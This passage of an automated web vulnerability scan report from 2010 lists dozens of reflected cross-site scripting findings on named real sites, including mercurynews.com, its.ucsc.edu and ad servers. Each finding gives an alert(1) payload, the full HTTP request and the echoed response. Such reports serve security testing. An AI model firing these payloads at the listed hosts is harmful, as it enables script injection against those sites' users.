HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:49 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C92"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=cd01c"-alert(1)-"a4de3bd6ee&searchterm=";
/* var img = document.createElement('img'); img.width=1; img.height=1; img.style.display='none'; img.src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C92';
The value of the searchterm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60ba4"-alert(1)-"436384b182e was submitted in the searchterm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=N&referrer=&paidornatural=&searchterm=60ba4"-alert(1)-"436384b182e&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:50 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C96"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm=60ba4"-alert(1)-"436384b182e";
4.45. http://its.ucsc.edu/terms/google_analytics.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://its.ucsc.edu
Path: /terms/google_analytics.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 670d3"><img%20src%3da%20onerror%3dalert(1)>cdb91376758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 670d3"><img src=a onerror=alert(1)>cdb91376758 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /terms/google_analytics.php/670d3"><img%20src%3da%20onerror%3dalert(1)>cdb91376758 HTTP/1.1 Host: its.ucsc.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:57:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 10764
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML lang="en-us"> <HEAD> <TITLE>UC Santa Cruz - Information Technology Servic ...[SNIP]... <A href="../../terms/google_analytics.php/670d3"><img src=a onerror=alert(1)>cdb91376758"> ...[SNIP]...
4.46. http://its.ucsc.edu/terms/google_analytics.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://its.ucsc.edu
Path: /terms/google_analytics.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe6e"><script>alert(1)</script>96a3eba5b55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /terms/google_analytics.php?ffe6e"><script>alert(1)</script>96a3eba5b55=1 HTTP/1.1 Host: its.ucsc.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:57:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 10647
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML lang="en-us"> <HEAD> <TITLE>UC Santa Cruz - Information Technology Servic ...[SNIP]... <A href="../terms/google_analytics.php?&ffe6e"><script>alert(1)</script>96a3eba5b55=1"> ...[SNIP]...
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b0629<script>alert(1)</script>0b77686651d was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=H06572b0629<script>alert(1)</script>0b77686651d HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.carpricesecrets.com/page_footer_frame.php?vid=1&detid=1002&zip=&make=Mercury&make_id=28&model=&key=New+CPCLogic&body=&msrp=N%2FA&year=&page_category=landing Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=optout; NETOPTOUT=true
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 08 Dec 2010 00:13:31 GMT Cache-Control: max-age=86400, private Expires: Thu, 09 Dec 2010 00:13:31 GMT Content-Type: application/javascript;charset=ISO-8859-1 Date: Wed, 08 Dec 2010 00:13:31 GMT Content-Length: 128
/* * JavaScript include error: * The customer code "H06572B0629<SCRIPT>ALERT(1)</SCRIPT>0B77686651D" was not recognized. */
4.48. http://m.mercurynews.com/sjm/db_101028/contentdetail.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101028/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19f82"><script>alert(1)</script>4b108635a9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101028/contentdetail.htm?contentguid=bfCKUWJb&detailindex=0&pn=0&ps=5&19f82"><script>alert(1)</script>4b108635a9a=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.49. http://m.mercurynews.com/sjm/db_101028_index.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101028_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c06f1"><script>alert(1)</script>d1962495225 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101028_index.htm?c06f1"><script>alert(1)</script>d1962495225=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.50. http://m.mercurynews.com/sjm/db_101030/contentdetail.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101030/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8abf6"><script>alert(1)</script>6270b4d5e06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101030/contentdetail.htm?contentguid=j3yRrXfp&detailindex=0&pn=0&ps=5&8abf6"><script>alert(1)</script>6270b4d5e06=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.51. http://m.mercurynews.com/sjm/db_101032_index.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101032_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e1e"><script>alert(1)</script>d41c9dfa8d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101032_index.htm?52e1e"><script>alert(1)</script>d41c9dfa8d0=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.52. http://m.mercurynews.com/sjm/db_101036/contentdetail.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101036/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54547"><script>alert(1)</script>20e3f837658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101036/contentdetail.htm?contentguid=vpuLbmlP&detailindex=0&pn=0&ps=5&54547"><script>alert(1)</script>20e3f837658=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.53. http://m.mercurynews.com/sjm/db_101036_index.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101036_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 455d1"><script>alert(1)</script>e591c9d409d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101036_index.htm?455d1"><script>alert(1)</script>e591c9d409d=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.54. http://m.mercurynews.com/sjm/db_101038/contentdetail.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101038/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2a20"><script>alert(1)</script>756b07ee7a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101038/contentdetail.htm?contentguid=9NUFyZNJ&detailindex=0&pn=0&ps=5&e2a20"><script>alert(1)</script>756b07ee7a8=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.55. http://m.mercurynews.com/sjm/db_101041/contentdetail.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101041/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45697"><script>alert(1)</script>0c5b5d877c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101041/contentdetail.htm?contentguid=fOlsgQ8X&detailindex=0&pn=0&ps=5&45697"><script>alert(1)</script>0c5b5d877c=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.56. http://m.mercurynews.com/sjm/db_101041_index.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101041_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e483d"><script>alert(1)</script>2dd65140bff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101041_index.htm?e483d"><script>alert(1)</script>2dd65140bff=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.57. http://m.mercurynews.com/sjm/db_101043/contentdetail.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101043/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f633"><script>alert(1)</script>cbbb9beb498 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101043/contentdetail.htm?contentguid=NJ3OB094&detailindex=0&pn=0&ps=5&4f633"><script>alert(1)</script>cbbb9beb498=1 HTTP/1.1
Host: m.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
4.58. http://m.mercurynews.com/sjm/db_101043_index.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101043_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c39e3"><script>alert(1)</script>a92c8ec891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101043_index.htm?c39e3"><script>alert(1)</script>a92c8ec891=1 HTTP/1.1
Host: m.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
4.59. http://m.mercurynews.com/sjm/db_101049/contentdetail.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101049/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b990a"><script>alert(1)</script>21271a9f18a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101049/contentdetail.htm?contentguid=l6Ndxsf3&detailindex=0&pn=0&ps=5&b990a"><script>alert(1)</script>21271a9f18a=1 HTTP/1.1
Host: m.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
4.60. http://m.mercurynews.com/sjm/db_101049_index.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101049_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24376"><script>alert(1)</script>dd5a53769de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101049_index.htm?24376"><script>alert(1)</script>dd5a53769de=1 HTTP/1.1
Host: m.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
4.61. http://m.mercurynews.com/sjm/db_101051/contentdetail.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101051/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab82a"><script>alert(1)</script>78ccedf2046 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101051/contentdetail.htm?contentguid=NxA2JPFC&detailindex=0&pn=0&ps=5&ab82a"><script>alert(1)</script>78ccedf2046=1 HTTP/1.1
Host: m.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
4.62. http://m.mercurynews.com/sjm/db_101051_index.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_101051_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9942"><script>alert(1)</script>80b2236ef24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101051_index.htm?f9942"><script>alert(1)</script>80b2236ef24=1 HTTP/1.1
Host: m.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
4.63. http://m.mercurynews.com/sjm/db_12120_index.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/db_12120_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ea20"><script>alert(1)</script>ecbcbb193ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_12120_index.htm?9ea20"><script>alert(1)</script>ecbcbb193ec=1 HTTP/1.1
Host: m.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
4.64. http://m.mercurynews.com/sjm/index.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://m.mercurynews.com
Path: /sjm/index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43e5"><script>alert(1)</script>e38bbf29b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/index.htm?c43e5"><script>alert(1)</script>e38bbf29b2=1 HTTP/1.1
Host: m.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2df9c"%3balert(1)//819d7381225 was submitted in the lang parameter. This input was echoed as 2df9c";alert(1)//819d7381225 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng2df9c"%3balert(1)//819d7381225&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group
Accept: */*
